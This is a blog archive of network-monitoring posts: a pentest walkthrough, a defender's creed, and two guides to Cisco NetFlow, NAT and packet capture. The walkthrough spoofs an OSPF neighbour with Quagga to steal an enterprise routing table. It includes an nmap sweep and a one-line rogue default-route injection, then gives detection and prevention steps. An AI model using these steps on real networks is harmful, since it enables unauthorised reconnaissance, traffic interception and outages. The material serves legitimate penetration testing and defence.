Archive for the NSM Category

Cap’n Quagga’s Pirate Treasure Map

Posted in Cisco, Networking, NSM on 23 November, 2010 by Alec Waters

Avast, me hearties! When a swashbucklin’ pirate sights land whilst sailin’ uncharted waters, the first thing he be doin’ is makin’ a map. Ye can’t be burying ye treasure if ye don’t have a map, yarrr!

PUBLIC SERVICE ANNOUNCEMENT

For everyone’s sanity, the pirate speak ends now. Save it for TLAP day!

When searching for booty on a network, it’s often useful to have a map. If you’ve got a foothold during a pentest, for example, how far does your conquered domain stretch? Is it a single-subnet site behind a SOHO router, or a tiny outpost of a corporate empire spanning several countries?

To get the answer, the best thing to do is ask one of the locals. In this case, we’re going to try to convince a helpful router to give up the goods and tell us what the network looks like. The control plane within the enterprise’s routers contains the routing table, which is essentially a list of destination prefixes (i.e., IP networks) and the next-hop to be used to get there (i.e., which neighbouring router to pass traffic on to in order to reach a destination).

The routing table is populated by a routing protocol (such as BGP, OSPF, EIGRP or RIP), which may in turn have many internal tables and data structures of its own. Interior routing protocols (like OSPF) take a “technical” perspective, automatically finding the “shortest” and “fastest” route from A to B within the enterprise; exterior routing protocols like BGP are more interested in implementing human-written traffic forwarding policies between different organisations.

The key word above is automatic. Interior routing protocols like to discover new neighbouring routers without intervention – they can therefore cater for failed routers that come back online, and allow the network to grow and have the “best” paths recomputed automatically.

So, how are we going to get our treasure map so that we know how far we can explore? We’re going to call in Cap’n Quagga!

Technically, it's James the Pirate Zebra, but seriously man, you try finding a picture of a pirate quagga!! They're extinct, for starters!

Pirate Cap'n Quagga aboard his ship, "Ye Stripy Scallywag"

Quagga is a software implementation of a handful of routing protocols. We’re going to use it to convince the local router that we’re a new member of the pirate fleet, upon which the router will form a neighbour relationship with us. After this has happened we’ll end up with our pirate treasure map, namely the enterprise’s routing table. Finally, we’ll look at ways in which the corporate privateers can detect Cap’n Quagga, and ways to prevent his buckle from swashing in the first place.

For the purposes of this article we’re going to use OSPF, but the principles hold for other protocols too. OSPF is quite a beast, and full discussion of the protocol is well beyond the scope of this article – interested parties should pick up a book.

Step One – Installing and configuring Quagga

I’m using Debian, so ‘apt-get install quagga’ will do the job quite nicely. Once installed, we need to tweak a few files:

/etc/quagga/daemons

This file controls which routing protocols will run. We’re interested only in OSPF for this example, so we can edit it as follows:

zebra=yes
bgpd=no
ospfd=yes
ospf6d=no
ripd=no
ripngd=no

As shown above, we need to turn on the zebra daemon too – ospfd can’t stand alone.

Next, we need to set up some basic config files for zebra and ospfd:

/etc/quagga/zebra.conf

hostname pentest-zebra
password quagga
enable password quagga

/etc/quagga/ospfd.conf

hostname pentest
password quagga
enable password quagga
log stdout

Now we can force a restart of Quagga with ‘/etc/init.d/quagga restart’.

For more information, see the official Quagga documentation and wiki; there are also some good tutorials around online.

Step Two – Climb the rigging to the crow’s nest and get out ye spyglass

We need to work out if there’s a router on the local subnet that’s running OSPF. This step is straightforward, as OSPF sends out multicast “Hello” packets by default every ten seconds – all we have to do is listen for it. As far as capturing this traffic goes, it has a few distinguishing features:

  • The destination IP address is 224.0.0.5, the reserved AllSPFRouters multicast address
  • The IP datagrams have a TTL of one, ensuring that the multicast scope is link local only
  • OSPF does not ride inside TCP or UDP – it has its own IP Protocol number, 89.

The easiest capture filter for tshark/tethereal or their GUI equivalents is simply “ip proto 89”; this will capture OSPF hellos in short order:

Ahoy there, matey!

Apart from confirming the presence of a local OSPF router, this information is critical in establishing the next step on our journey to plunderville – we need Quagga’s simulated router to form a special kind of neighbour relationship with the real router called an “adjacency”. Only once an adjacency has formed will routing information be exchanged. Fortunately, everything we need to know is in the hello packet:

Ye're flying my colours, matey!

For a text-only environment, “tshark -i eth0 -f 'ip proto 89' -V” provides similar output.

Step Three – configure Quagga’s OSPF daemon

For an adjacency to form (which will allow the exchange of LSAs, which will allow us to populate the OSPF database, which will allow us to run the SPF algorithm, which will allow us to populate the local IP routing table…), we need to configure Quagga so that all of the highlighted parameters above match. The command syntax is very Cisco-esque, and supports context sensitive help, abbreviated commands and tab completion. I’m showing the full commands here, but you can abbreviate as necessary:

# telnet localhost ospfd
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.

Hello, this is Quagga (version 0.99.17).
Copyright 1996-2005 Kunihiro Ishiguro, et al.

User Access Verification

Password:
pentest> enable
Password:
pentest# configure terminal
pentest(config)# interface eth0
! Make the hello and dead intervals match what we’ve captured
pentest(config-if)# ospf hello-interval 10
pentest(config-if)# ospf dead-interval 40
pentest(config-if)# exit
pentest(config)# router ospf
! eth0 on this machine was given 192.168.88.49 by DHCP
! The command below will put any interfaces in
! 192.168.88.0/24 into area 0.0.0.4, effectively
! therefore “turning on” OSPF on eth0
! The area id can be specified as an integer (4) or
! as a dotted quad (0.0.0.4)
pentest(config-router)# network 192.168.88.0/24 area 0.0.0.4
pentest(config-router)# exit
pentest(config)# exit

We can check our work by looking at the running-config:

pentest# show running-config

Current configuration:
!
hostname pentest
password quagga
enable password quagga
log stdout
!
!
!
interface eth0
!
interface lo
!
router ospf
network 192.168.88.0/24 area 0.0.0.4
!
line vty
!
end

The Hello and Dead intervals of 10 and 40 are the defaults, which is why they don’t show in the running-config under ‘interface eth0’.
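If you want to double-check the timers (along with the area, network type and DR/BDR election state) without trawling the config, ospfd will report them per interface:

pentest# show ip ospf interface eth0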

Step Four – Start diggin’, matey!

With a bit of luck, we’ll have formed an OSPF adjacency with the local router:

pentest# show ip ospf neighbor

Neighbor ID Pri  State    Dead Time Address        Interface
172.16.7.6   1  Full/DR  32.051s   192.168.88.1 eth0:192.168.88.49

If we exit from Quagga’s OSPF daemon and connect to zebra instead, we can look at our shiny new routing table. Routes learned via OSPF are prefixed with O:

# telnet localhost zebra
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.

Hello, this is Quagga (version 0.99.17).
Copyright 1996-2005 Kunihiro Ishiguro, et al.

User Access Verification

Password:
pentest-zebra> show ip route
Codes: K – kernel route, C – connected, S – static, R – RIP, O – OSPF,
I – ISIS, B – BGP, > – selected route, * – FIB route

O   0.0.0.0/0 [110/1] via 192.168.88.1, eth0, 00:04:45
K>* 0.0.0.0/0 via 192.168.88.1, eth0
O>* 10.4.0.0/26 [110/1012] via 192.168.88.1, eth0, 00:04:46
O>* 10.4.0.64/26 [110/1012] via 192.168.88.1, eth0, 00:04:46
O>* 10.4.0.128/26 [110/1012] via 192.168.88.1, eth0, 00:04:46
O>* 10.4.0.192/26 [110/1012] via 192.168.88.1, eth0, 00:04:46
O>* 10.4.2.0/26 [110/1012] via 192.168.88.1, eth0, 00:04:46
O>* 10.4.3.0/26 [110/1012] via 192.168.88.1, eth0, 00:04:46
O>* 172.16.6.0/30 [110/15] via 192.168.88.1, eth0, 00:04:46
O>* 172.16.6.4/30 [110/16] via 192.168.88.1, eth0, 00:04:46
O>* 172.16.6.8/30 [110/11] via 192.168.88.1, eth0, 00:04:46
O>* 172.16.6.12/30 [110/110] via 192.168.88.1, eth0, 00:04:46
O>* 172.16.7.1/32 [110/12] via 192.168.88.1, eth0, 00:04:46
O>* 172.16.7.2/32 [110/13] via 192.168.88.1, eth0, 00:04:46
O>* 172.16.7.3/32 [110/16] via 192.168.88.1, eth0, 00:04:46
O>* 172.16.7.4/32 [110/1012] via 192.168.88.1, eth0, 00:04:46
O>* 172.16.7.5/32 [110/1012] via 192.168.88.1, eth0, 00:04:46

We clearly are not just sitting on a single-subnet LAN! Here are some of the things we can learn from the routing table:

  • Firstly, we’ve got a few more subnets than merely the local one to enumerate with nmap etc (see the quick sweep sketch after this list)!
  • We can estimate roughly how far away the subnets are by looking at the route metrics. An example above is the ‘1012’ part of ‘[110/1012]’. 1012 is the metric for the route, with the precise meaning of “metric” varying from routing protocol to routing protocol. In the case of OSPF, by default this is the sum of the interface costs between here and the destination, where the interface cost is derived from the interface’s speed. The 110 part denotes the OSPF protocol’s “administrative distance”, which is a measure of the trustworthiness of a route offered for inclusion in the routing table by a given routing protocol. If two protocols offer the routing table exactly the same prefix (10.4.3.0/26, for example), the routing protocol with the lowest AD will “win”.
  • A good number of these routes have a prefix length of /26 (i.e., a subnet mask of 255.255.255.192), meaning that they represent 64 IP addresses. These are likely to be host subnets with new victims on them.
  • The /30 routes (4 IP addresses) are likely to be point-to-point links between routers or even WAN or VPN links between sites.
  • The /32 routes (just one IP address) are going to be loopback addresses on individual routers. If you want to target infrastructure directly, these are the ones to go for.
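As a quick sketch of the follow-up reconnaissance mentioned in the first bullet (nmap options are very much a matter of taste), a ping sweep of one of the discovered host subnets might look like this:

nmap -sn 10.4.0.64/26

(Older versions of nmap spell the ping-sweep option -sP rather than -sn.)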

If you want to start digging really deeply, you can look at the OSPF database (show ip ospf database), but that’s waaay out of scope for now.

Step Five – Prepare a broadside!

If we’ve got to this point, we are in a position not only to conduct reconnaissance, but we could also start injecting routes into their routing table or manipulate the prefixes already present in an effort to redirect traffic to us (or to a blackhole). Originating a default route is always fun, since it will take precedence over legitimate static default routes that have been redistributed into OSPF (redistributed routes are “External” in OSPF terminology, and are less preferable to “internal” routes such as our fraudulent default). If we had a working default route of our own, this approach could potentially redirect Internet traffic for the entire enterprise through our Quagga node where we can capture it. Either that or you’ll bring the network to a screaming halt.
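Just to illustrate how little effort it would take, originating a rogue default from Quagga’s ospfd is a one-liner under the OSPF process (a sketch, assuming the adjacency above is already up):

pentest(config)# router ospf
pentest(config-router)# default-information originate always metric 10

The “always” keyword advertises a default whether or not we actually have one of our own.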

Anyway, it’s all moot, since we’re nice pirates and would never consider doing anything like that!

Privateers off the starboard bow, Cap’n!

How can we detect such naughtiness, and even better, prevent it?

The first step is to use the OSPF command ‘log-adjacency-changes’ on all the enterprise’s OSPF routers. This will leave log messages like this:

Nov 23 15:11:24.666 UTC: %OSPF-5-ADJCHG: Process 2, Nbr 192.168.88.49 on GigabitEthernet0/0.2 from LOADING to FULL, Loading Done

Keeping track of adjacency changes is an excellent idea – it’s a metric of the stability of the network, and also offers clues when rogue devices form adjacencies.
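For reference, it’s a single command under the OSPF process (process number 2 matches the log message above; add “detail” if you want every neighbour state transition logged rather than just adjacencies reaching FULL or being torn down):

router(config)#router ospf 2
router(config-router)#log-adjacency-changes detail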

Stopping rogue adjacencies altogether can be accomplished in two ways. The first is to make OSPF interfaces on host-only subnets “passive”, which permits them to participate in OSPF without allowing adjacencies to form.

The second method is to use OSPF authentication, whereby a hash of a preshared key is required before an adjacency can be established. Either method is strongly recommended!
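Here’s a minimal IOS sketch of both measures. The interface names, key number and key are examples only: Serial0/1/0 stands in for a genuine router-to-router link that still needs an adjacency, and everything else (including the host subnet from the log message above) goes passive:

router(config)#router ospf 2
router(config-router)#passive-interface default
router(config-router)#no passive-interface Serial0/1/0
router(config-router)#area 0.0.0.4 authentication message-digest
router(config-router)#exit
router(config)#interface Serial0/1/0
router(config-if)#ip ospf message-digest-key 1 md5 YeStripyScallywag

“passive-interface default” turns every interface passive in one go; you then explicitly re-enable only those interfaces where adjacencies are genuinely required.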

As always, keep yer eyes to the horizon, mateys! 🙂


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

The Analyst’s Creed

Posted in NSM on 2 November, 2010 by Alec Waters

These are my logfiles. There are many like them, but these ones are mine. My logfiles are my best friends. They are my life. I must master them as I must master my life. My logfiles, without me, are useless. Without my logfiles, I am useless. I must comprehend my logfiles’ every word. I must be more vigilant than my enemy who is trying to invade me. I must detect him before he compromises me.

I will…

My network and myself know that what counts in this war is not the products we buy, nor the number of our certifications. We know that it is the detections and investigations that count.

We will detect and investigate…

My network is human, even as I, because it is my life. Thus, I will learn it as a brother. I will learn its weaknesses, its strength, its parts, its accessories, its services and its users. I will assume nothing and verify everything. I will ever guard it against the ravages of opportunistic attack and determined infiltration as I will ever guard my legs, my arms, my eyes and my heart against damage. I will keep my CSIRT trained and ready. We will become part of each other.

We will…

Before $Deity, I swear this creed. My logfiles and myself are the defenders of my enterprise. We are the masters of our enemy. We are the saviors of my life. So be it, until victory is ours and there is no enemy, but peace!

Adapted from the Rifleman’s Creed.


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

The Cisco Kid and the Great Packet Roundup, part two – session data

Posted in Cisco, General Security, NSM on 26 October, 2010 by Alec Waters

In part one, I covered how to use Cisco routers and firewalls to perform full packet capture. This exciting installment will cover how to get network session data out of these devices.

Network session data can be likened to a real-world itemised telephone bill. It tells you who “called” who, at what times, for how long, and how much was said (but not what was said). It’s an excellent lightweight way to see what’s going on armed only with a command prompt.

There are several ways to extract such information from Cisco kit; we’ll look at each in turn, following Part One’s support/troubleshooting/IR scenario of accessing remote devices where you’re not able to make topological changes or install any extra software or hardware.

Netflow

The richest source of session information on Cisco devices is Netflow (I’ll leave the finer points of its many incarnations to Cisco’s documentation). If you’re able to set up a Netflow collector/analyser (there are plenty to choose from, some of them free for small deployments) you can drill down into your session info as far as you like. If you haven’t got an analyser or you can’t install one in time of need, it’s still worth switching on Netflow because you can interrogate the flow cache from the command line.
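That said, getting the flow cache populated for CLI interrogation only takes a couple of commands per interface. A sketch follows; the interface name and collector address are examples, and the export lines are only needed if you do have a collector to send flows to:

router(config)#interface GigabitEthernet0/0
router(config-if)#ip flow ingress
router(config-if)#ip flow egress
router(config-if)#exit
router(config)#ip flow-export version 5
router(config)#ip flow-export destination 192.0.2.10 2055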

The command is “show ip cache flow”, and the output is split into two parts. The first shows some statistical information about the flows that the router has observed:

router#sh ip cache flow
IP packet size distribution (3279685 total packets):
 1-32   64   96  128  160  192  224  256  288  320  352  384  416  448  480
 .000 .184 .182 .052 .072 .107 .004 .005 .000 .000 .000 .000 .000 .000 .000

 512  544  576 1024 1536 2048 2560 3072 3584 4096 4608
 .000 .000 .001 .020 .365 .000 .000 .000 .000 .000 .000

IP Flow Switching Cache, 278544 bytes
 57 active, 4039 inactive, 418030 added
 10157020 ager polls, 0 flow alloc failures
 Active flows timeout in 1 minutes
 Inactive flows timeout in 15 seconds
IP Sub Flow Cache, 34056 bytes
 57 active, 967 inactive, 418030 added, 418030 added to flow
 0 alloc failures, 0 force free
 1 chunk, 1 chunk added
 last clearing of statistics never
Protocol     Total    Flows   Packets Bytes  Packets Active(Sec) Idle(Sec)
--------     Flows     /Sec     /Flow  /Pkt     /Sec     /Flow     /Flow
TCP-WWW       6563      0.0       186  1319      1.2       4.7       1.4
TCP-other    16163      0.0         1    47      0.0       0.0      15.4
UDP-DNS         12      0.0         1    67      0.0       0.0      15.6
UDP-NTP       1010      0.0         1    76      0.0       0.0      15.0
UDP-Frag         2      0.0         6   710      0.0       0.2      15.3
UDP-other   316602      0.3         2   156      0.8       0.6      15.4
ICMP         31165      0.0         6    63      0.2      53.4       2.2
IP-other     46438      0.0        21   125      1.0      58.0       2.1
Total:      417955      0.4         7   574      3.3      11.0      12.7

In the absence of a graphical Netflow analyser, the Packets/Sec counter is a good barometer of what’s “using up all the bandwidth”. To clear the stats so that you can establish a baseline, you can use the command “clear ip flow stats”.

After the stats comes a listing of all the flows currently being tracked by the router:

SrcIf     SrcIPaddress    DstIf     DstIPaddress    Pr SrcP DstP  Pkts
Fa4       xxx.xxx.xxx.xxx Local     yyy.yyy.yyy.yyy 32 3FAF 037C    16
Tu100     10.7.1.250      BV3       10.4.1.3        06 0051 C07A   663
Tu100     10.7.1.250      BV3       10.4.1.3        06 0050 C0AC   120
BV3       10.4.1.3        Tu100     10.7.1.250      06 C0AC 0050   116
Tu100     192.168.88.20   Local     172.16.7.10     01 0000 0800     5
BV3       10.4.1.3        Fa4       zzz.zzz.zzz.zzz 06 C0A2 0050   429
BV3       10.4.1.3        Tu100     10.7.1.250      06 C07A 0051   366
Fa4       bbb.bbb.bbb.bbb BV3       yyy.yyy.yyy.yyy 06 0050 C0A0     1
BV3       10.4.1.3        Fa4       ddd.ddd.ddd.ddd 06 C07E 0050     1
Tu100     192.168.88.56   Local     172.16.7.10     06 8081 0016     7
Fa4       zzz.zzz.zzz.zzz BV3       yyy.yyy.yyy.yyy 06 0050 C0A2   763
Tu100     192.168.88.28   Local     172.16.7.10     11 04AC 00A1     1
Tu100     192.168.88.28   Local     172.16.7.10     11 04A6 00A1     1
Fa4       aaa.aaa.aaa.aaa Local     yyy.yyy.yyy.yyy 32 275F BD8A     5
Fa4       ccc.ccc.ccc.ccc Local     yyy.yyy.yyy.yyy 32 97F1 E9BE     5
Tu100     10.7.1.242      Local     172.16.7.10     01 0000 0000     3
Fa4       ddd.ddd.ddd.ddd BV3       yyy.yyy.yyy.yyy 06 0050 C07E     1

The tempting simplicity of the table above hides a plethora of gotchas for the unwary:

  • The Pr (IP protocol number), SrcP (source port) and DstP (destination port) columns are in hex, but we can all do the conversion in our heads, right? 😉 (If not, there’s a one-liner at the end of this section.)
  • Netflow is a unidirectional technology. That means that if hosts A and B are talking to one another via a single TCP connection, two flows will be logged – one for A->B and one for B->A. For example, these two rows in the table above are talking about the same TCP session (the four-tuple of addresses and ports is the same for both rows):
Tu100     10.7.1.250      BV3       10.4.1.3        06 0051 C07A   663
BV3       10.4.1.3        Tu100     10.7.1.250      06 C07A 0051   366
  • Unless you configure it otherwise, Netflow is an ingress technology. This means that flows are accounted for as they enter the router, not as they leave. You can determine what happens on the egress side of things because when a flow is accounted for the output interface is determined by a FIB lookup and placed in the DstIf column; in this way, you can track a flow’s path through the router. I mention this explicitly because…
  • Netflow does not sit well with NAT. Take a look at these two rows, which represent an HTTP download (port 0x0050 is 80 in decimal) requested of non-local server zzz.zzz.zzz.zzz by client 10.4.1.3:
BV3       10.4.1.3        Fa4       zzz.zzz.zzz.zzz 06 C0A2 0050   429
Fa4       zzz.zzz.zzz.zzz BV3       yyy.yyy.yyy.yyy 06 0050 C0A2   763

So what’s yyy.yyy.yyy.yyy, then? It’s the NAT inside global address representing 10.4.1.3. As Netflow is unidirectional and is recorded as it enters an interface, the returning traffic from zzz.zzz.zzz.zzz will have the post-NAT yyy.yyy.yyy.yyy as its destination address, and will be recorded as such.

Provided that you keep that lot in mind, the flow cache is a powerful tool to explore the traffic your router is handling.
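As promised, the hex-to-decimal one-liner; any nearby shell will oblige:

$ printf '%d\n' 0xC07A
49274

So 0xC07A is port 49274, and by the same token 0x0050 is port 80 and 0x0016 is port 22.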

NAT translations

A typical border router may well perform NAT/PAT tasks. If so, you can use the NAT database as a source of session information. On a router, the command is “show ip nat translations [verbose]”; on a PIX/ASA, it’s “show xlate [debug]”:

router#show ip nat translations
Pro Inside global         Inside local   Outside local    Outside global
tcp yyy.yyy.yyy.yyy:49314 10.4.1.3:49314 94.42.37.14:80   94.42.37.14:80
tcp yyy.yyy.yyy.yyy:49316 10.4.1.3:49316 92.123.68.49:80  92.123.68.49:80

If you’ve got a worm on your network that’s desperately trying to spread, chances are you’ll see a ton of NAT translations (which could overwhelm a small router). Rather than paging through thousands of lines of output, you can just ask the device for some NAT statistics. On a router, it’s “show ip nat statistics”; on a PIX/ASA, it’s “show xlate count”.

Keeping tabs on the number of active NAT translations is a worthwhile thing to do. I wrote a story for Security Monkey’s blog a while back which tells the tale of a worm exhausting a router’s memory with NAT translations; you can even graph the number of translations to look for anomalies over time.

Firewall sessions

Another way of extracting session information is to ask the router or PIX about the sessions it is currently tracking for firewall purposes. On a router it’s “show ip inspect sessions [detail]”; on the PIX/ASA, it’s “show conn [detail]”.

router#show ip inspect sessions detail
Established Sessions
 Session 842064A4 (10.4.1.3:49446)=>(92.123.68.81:80) http SIS_OPEN
  Created 00:00:59, Last heard 00:00:58
  Bytes sent (initiator:responder) [440:4269]
  In  SID 92.123.68.81[80:80]=>y.y.y.y[49446:49446] on ACL outside-fw (6 matches)
 Session 84206FC4 (10.4.1.3:49443)=>(92.123.68.81:80) http SIS_OPEN
  Created 00:00:59, Last heard 00:00:59
  Bytes sent (initiator:responder) [440:2121]
  In  SID 92.123.68.81[80:80]=>y.y.y.y[49443:49443] on ACL outside-fw (4 matches)
 Session 8420728C (10.4.1.3:49436)=>(92.123.68.81:80) http SIS_OPEN
  Created 00:01:01, Last heard 00:00:50
  Bytes sent (initiator:responder) [1343:48649]
  In  SID 92.123.68.81[80:80]=>y.y.y.y[49436:49436] on ACL outside-fw (44 matches)

This has the advantage of not being complicated by NAT, but still showing useful bytecounts and session durations.

Last resorts

If none of the above can help you out, there are a couple of last resort options open to you. The first of these is the “ip accounting” interface configuration command on IOS routers. To quote Cisco:

The ip accounting command records the number of bytes (IP header and data) and packets switched through the system on a source and destination IP address basis. Only transit IP traffic is measured and only on an outbound basis; traffic generated by the router access server or terminating in this device is not included in the accounting statistics. Traffic coming from a remote site and transiting through a router is also recorded.
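Turning it on is done per interface (the interface name below is just an example):

router(config)#interface GigabitEthernet0/0
router(config-if)#ip accounting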

Also note that this command will likely have a performance impact on the router. You may end up causing more problems than you solve by using this! The output of “show ip accounting” will look something like this:

router# show ip accounting
 Source          Destination            Packets      Bytes
 172.16.19.40    192.168.67.20          7            306
 172.16.13.55    192.168.67.20          67           2749
 172.16.2.50     192.168.33.51          17           1111
 172.16.2.50     172.31.2.1             5            319
 172.16.2.50     172.31.1.2             463          30991
 172.16.19.40    172.16.2.1             4            262

If “ip accounting” was a last resort, “debug ip packet” is what you’d use as an even lasterer resort, so much so that I leave it as an exercise for the reader to find out all about it. Don’t blame me when your router chokes to the extent that you can’t even enter “undebug all”…!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

The Cisco Kid and the Great Packet Roundup, part one

Posted in Cisco, General Security, NSM on 11 August, 2010 by Alec Waters

Knowing what your network is doing is central to the NSM doctrine, and the usual method of collecting NSM data is to attach a sensor of some kind to a tap or a span port on a switch.

But what if you can’t do this? What if you need to see what’s going on on a network that’s geographically remote and/or unprepared for conventional layer-2 capture? Quite a bit, as it turns out.

In the first of a two-part post, the Cisco Kid (i.e., me) is going to walk you through a number of ways to use an IOS router or ASA/PIX firewall to perform full packet capture. The two product sets have different capabilities and limitations, so we’ll look at each in turn.

PIX/ASA

Full packet capture has been supported on these devices for many years, and it’s quite simple to operate. Step one is to create an ACL that defines the traffic we’re interested in capturing – because all of the captures are stored in memory, we need to be as specific as we can otherwise we’ll be using scarce RAM to capture stuff we don’t care about.

Let’s assume we’re interested in POP3 traffic. Start by defining an ACL like this:

pix(config)# access-list temp-pop3-acl permit tcp any eq 110 any
pix(config)# access-list temp-pop3-acl permit tcp any any eq 110

Note that we’ve specified port 110 as the source or the destination – we wouldn’t want to risk only capturing one side of the conversation.

Now we can fire up the capture, part of which involves specifying the size of the capture buffer. Remembering that this will live in main memory, we’d better have a quick check to see how much is going spare:

pix# show memory
Free memory:        31958528 bytes (34%)
Used memory:        60876368 bytes (66%)
Total memory:       92834896 bytes (100%)

Plenty, in this case. Let’s start the capture:

pix# capture temp-pop3-cap access-list temp-pop3-acl buffer 1024000 packet-length 1514 interface outside-if circular-buffer

This command gives us a capture called temp-pop3-cap, filtered using our ACL, stored in a one-meg (circular) memory buffer, that will capture frames of up to 1514 bytes in size from the interface called outside-if. If you don’t specify a packet-length, you won’t end up capturing entire frames.

Now we can check that we’re actually capturing stuff:

pix# show capture temp-pop3-cap
5 packets captured
1: 12:22:02.410440 xxx.xxx.xxx.xxx.39032 > yyy.yyy.yyy.yyy.110: S 3534424301:3534424301(0) win 65535 <mss 1260,nop,nop,sackOK>
2: 12:22:02.411401 yyy.yyy.yyy.yyy.110 > xxx.xxx.xxx.xxx.39032: S 621655548:621655548(0) ack 3534424302 win 16384 <mss 1380,nop,nop,sackOK>
3: 12:22:02.424691 xxx.xxx.xxx.xxx.39032 > yyy.yyy.yyy.yyy.110: . ack 621655549 win 65535
4: 12:22:02.425515 yyy.yyy.yyy.yyy.110 > xxx.xxx.xxx.xxx.39032: P 621655549:621655604(55) ack 3534424302 win 65535
5: 12:22:02.437462 xxx.xxx.xxx.xxx.39032 > yyy.yyy.yyy.yyy.110: P 3534424302:3534424308(6) ack 621655604 win 65480

To get the capture off the box and into Wireshark, point your web browser at the PIX/ASA like this, specifying the capture’s name in the URL:

https://yourpix/admin/capture/temp-pop3-cap/pcap

Don’t forget the /pcap on the end, or you’ll end up downloading only the output of the ‘show capture temp-pop3-cap’ command.
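Depending on the platform and software version, you may also be able to push the capture off-box from the CLI instead of using a browser; something along these lines (the TFTP server address is an example):

pix# copy /pcap capture:temp-pop3-cap tftp://10.1.8.6/temp-pop3-cap.pcap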

To clean up, you can use the ‘clear capture’ command to empty the capture buffer (but still keep on capturing) and the ‘no capture’ command to destroy the buffer and stop capturing altogether.

Provided one is careful with the size of the capture buffer, it’s nice and easy, it works, and it’s quick to implement in an emergency. If you’re using the ASDM GUI, Cisco have a how-to here that will walk you through the process.

IOS routers

As we’ll see, things aren’t quite as nice in IOS land, but there’s still useful stuff we can do. As of 12.4(20)T, IOS supports the Embedded Packet Capture feature (EPC) which at first glance seems to be equivalent to the PIX/ASA’s capture feature. Again, we’ll start by creating an ACL for capturing POP3 traffic:

router(config)#ip access-list extended temp-pop3-acl
router(config-ext-nacl)#permit tcp any eq 110 any
router(config-ext-nacl)#permit tcp any any eq 110

Now we can set up the capture. This involves two steps, setting up a capture buffer (where to store the capture) and a capture point (where to capture from). The capture buffer is set up like this:

router#monitor capture buffer temp-pop3-buffer size 512 max-size 1024 circular

Here is where Cisco seem to have missed a trick. The ‘size’ parameter refers to the buffer size in kilobytes, and 512 is the maximum. That’s “Why???” #1 – 512KB seems like a very low limit to place on a capture buffer. “Why???” #2 is the ‘max-size’ parameter, which refers to the number of bytes in each frame that will be captured; 1024 is the maximum, well below Ethernet’s 1500-byte MTU. So we seem to be limited to capturing a small number of incomplete frames, which isn’t really in the spirit of “full” packet capture…

Sighing deeply, we move on to setting up the buffer’s filter using our ACL:

router#monitor capture buffer temp-pop3-buffer filter access-list temp-pop3-acl

Next, we create a capture point. This specifies where the frames will be captured, both from an interface and an IOS architecture point of view:

router#monitor capture point ip cef temp-pop3-point GigabitEthernet0/0.2 both

‘ip cef’ means we’re interested in capturing CEF-switched frames as opposed to process-switched ones, so if traffic you’re expecting to see in the buffer isn’t there, it could be that the router process-switched it, thus avoiding the capture point. The capture interface is specified, as is ‘both’, which means we’re interested in ingress and egress traffic.

Next (we’re almost there) we have to associate a buffer with a capture point:

router#monitor capture point associate temp-pop3-point temp-pop3-buffer

Now we can check our work before we start the capture:

router#show monitor capture buffer temp-pop3-buffer parameters
Capture buffer temp-pop3-buffer (circular buffer)
Buffer Size : 524288 bytes, Max Element Size : 1024 bytes, Packets : 0
Allow-nth-pak : 0, Duration : 0 (seconds), Max packets : 0, pps : 0
Associated Capture Points:
Name : temp-pop3-point, Status : Inactive
Configuration:
monitor capture buffer temp-pop3-buffer size 512 max-size 1024 circular
monitor capture point associate temp-pop3-point temp-pop3-buffer
monitor capture buffer temp-pop3-buffer filter access-list temp-pop3-acl

router#sh monitor capture point temp-pop3-point
Status Information for Capture Point temp-pop3-point
IPv4 CEF
Switch Path: IPv4 CEF            , Capture Buffer: temp-pop3-buffer
Status : Inactive
Configuration:
monitor capture point ip cef temp-pop3-point GigabitEthernet0/0.2 both

Start the capture:

router#monitor capture point start temp-pop3-point

And make sure we’re capturing stuff:

router#show monitor capture buffer temp-pop3-buffer dump
<frame by frame raw dump snipped>

When we’re done, we can stop the capture:

router#monitor capture point stop temp-pop3-point

And finally, we can export it off the box for analysis:

router#monitor capture buffer temp-pop3-buffer export tftp://10.1.8.6/temp-pop3.pcap

…and for all that work, we’ve ended up with a tiny pcap containing truncated frames. Better than nothing though!

However, there is a second option for IOS devices, provided that you have a capture workstation that’s on a directly attached ethernet subnet. It’s called Router IP Traffic Export (RITE), and will copy nominated packets and send them off-box to a workstation running Wireshark or similar (or an IDS, etc.). Captures therefore do not end up in a memory buffer, and it is the responsibility of the workstation to capture the exported packets and to work out which packets were actually exported from the router and which are those sent or received by the workstation itself.

After carefully reading the restrictions and caveats in the documentation, we can start by setting up a RITE profile. This defines what we’re going to monitor, and where we’re going to export the copied packets:

router(config)#ip traffic-export profile temp-pop3-profile
! Set the capture filter
router(conf-rite)#incoming access-list temp-pop3-acl
router(conf-rite)#outgoing access-list temp-pop3-acl
! Specify that we want to capture ingress and egress traffic
router(conf-rite)#bidirectional
! The capture workstation lives on the subnet attached to Gi0/0.2
router(conf-rite)#interface GigabitEthernet 0/0.2
! And the workstation's MAC address is:
router(conf-rite)#mac-address hhhh.hhhh.hhhh

Finally, we apply the profile to the interface from which we actually want to capture packets:

router(config)#interface GigabitEthernet 0/0.2
router(config-subif)#ip traffic-export apply temp-pop3-profile

If all’s gone well, the capture workstation on hhhh.hhhh.hhhh should start seeing a flow of POP3 traffic. We can ask the router how it’s getting on, too:

router#show ip traffic-export
Router IP Traffic Export Parameters
Monitored Interface         GigabitEthernet0/0
Export Interface                GigabitEthernet0/0.2
Destination MAC address hhhh.hhhh.hhhh
bi-directional traffic export is on
Output IP Traffic Export Information    Packets/Bytes Exported    19/1134

Packets Dropped           17877
Sampling Rate                one-in-every 1 packets
Access List                      temp-pop3-acl [named extended IP]

Input IP Traffic Export Information     Packets/Bytes Exported    27/1169

Packets Dropped           12153
Sampling Rate                one-in-every 1 packets
Access List                      temp-pop3-acl [named extended IP]

Profile temp-pop3-profile is Active

You get full packets captured (note packets, not frames – the encapsulating Ethernet frame isn’t the same as the original, in that it has the router’s MAC address as the source and the capture workstation’s MAC address as the destination), and provided you’re local to the router and can afford the potential performance hit on the box, it’s quite a neat way to perform an inline capture. Furthermore, this may be your only capturing option sometimes – granted, the capture workstation has to be on a local ethernet segment, but the traffic profile itself can be applied to other kinds of circuit for which you may not have a tap (ATM, synchronous serial, etc.). It’s a very useful tool.
